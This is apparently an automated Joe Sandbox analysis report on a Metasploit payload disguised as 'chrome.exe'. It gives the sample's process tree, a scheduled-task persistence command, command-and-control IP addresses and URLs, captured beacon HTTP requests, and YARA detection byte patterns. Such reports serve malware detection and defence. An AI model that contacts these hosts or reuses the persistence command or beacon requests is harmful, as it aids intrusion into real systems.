Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
chrome.exe

Overview

General Information

Sample Name:chrome.exe
Analysis ID:1270926
MD5:b2eaf44f5d0ea664e504c9c8c6c42d23
SHA1:c79f1dccf4aa3a973f9a5ad54e6f0d9497066971
SHA256:8897994e897bb1b2d22188d332ea972eff725b3b02b9dab0e5b5e73ab60d79c4
Tags:exe
Infos:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5780 cmdline: C:\Users\user\Desktop\chrome.exe MD5: B2EAF44F5D0EA664E504C9C8C6C42D23)
    • schtasks.exe (PID: 5700 cmdline: "schtasks.exe" /query /TN WinTask MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 1844 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • s1szwqo5.shl.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe" MD5: 468F9575A65D99F52FA2B52C505F59A6)
  • chrome.exe (PID: 5612 cmdline: C:\Users\user\Desktop\chrome.exe MD5: B2EAF44F5D0EA664E504C9C8C6C42D23)
    • schtasks.exe (PID: 7192 cmdline: "schtasks.exe" /query /TN WinTask MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Connect", "IP": "104.248.194.233", "Port": 443}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeJoeSecurity_MetasploitPayload_2Yara detected Metasploit PayloadJoe Security
    C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeWindows_Trojan_Metasploit_91bc5d7dunknownunknown
      • 0x18d7:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
        • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
        0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmpWindows_Trojan_Metasploit_91bc5d7dunknownunknown
        • 0xd7:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5
        00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
          • 0x329:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.chrome.exe.2715754b520.1.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            0.2.chrome.exe.2715754b520.1.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
            • 0xac9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
            0.2.chrome.exe.2715754b520.1.unpackWindows_Trojan_Metasploit_91bc5d7dunknownunknown
            • 0xb1f:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5
            10.0.s1szwqo5.shl.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              10.0.s1szwqo5.shl.exe.140000000.0.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
              • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
              Click to see the 8 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "104.248.194.233", "Port": 443}
              Multi AV Scanner detection for submitted file
              Source: chrome.exeReversingLabs: Detection: 63%
              Source: chrome.exeVirustotal: Detection: 64%Perma Link
              Antivirus / Scanner detection for submitted sample
              Source: chrome.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://128.199.113.162Avira URL Cloud: Label: malware
              Source: http://128.199.113.162/upwawsfrg.php?zd=1Avira URL Cloud: Label: malware
              Source: http://128.199.113.162/upwawsfrg.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: http://128.199.113.162Virustotal: Detection: 12%Perma Link
              Source: http://128.199.113.162/upwawsfrg.phpVirustotal: Detection: 14%Perma Link
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
              Machine Learning detection for sample
              Source: chrome.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeJoe Sandbox ML: detected
              Source: chrome.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 33MB
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 104.248.194.233
              Source: unknownTCP traffic detected without corresponding DNS query: 104.248.194.233
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: unknownTCP traffic detected without corresponding DNS query: 128.199.113.162
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.113.162
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027156FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.113.162/upwawsfrg.php
              Source: chrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027156F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.113.162/upwawsfrg.php?zd=1
              Source: chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.113.162x
              Source: chrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199H
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: unknownHTTP traffic detected: POST /upwawsfrg.php HTTP/1.1Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0Host: 128.199.113.162Content-Length: 126665Expect: 100-continueConnection: Keep-Alive
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeCode function: 10_2_00000001400040D6 LoadLibraryA,WSAStartup,WSASocketA,connect,recv,10_2_00000001400040D6
              Source: global trafficHTTP traffic detected: GET /upwawsfrg.php?zd=1 HTTP/1.1Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0Host: 128.199.113.162

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_91bc5d7d Author: unknown
              Source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_91bc5d7d reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04
              Source: chrome.exeStatic PE information: No import functions for PE file found
              Source: chrome.exeBinary or memory string: OriginalFilename vs chrome.exe
              Source: chrome.exe, 00000000.00000002.563185616.000002715546C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs chrome.exe
              Source: chrome.exeBinary or memory string: OriginalFilename vs chrome.exe
              Source: chrome.exe, 00000006.00000002.584356100.000001F0744A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs chrome.exe
              Source: chrome.exeReversingLabs: Detection: 63%
              Source: chrome.exeVirustotal: Detection: 64%
              Source: chrome.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\chrome.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\chrome.exe C:\Users\user\Desktop\chrome.exe
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\Desktop\chrome.exe C:\Users\user\Desktop\chrome.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
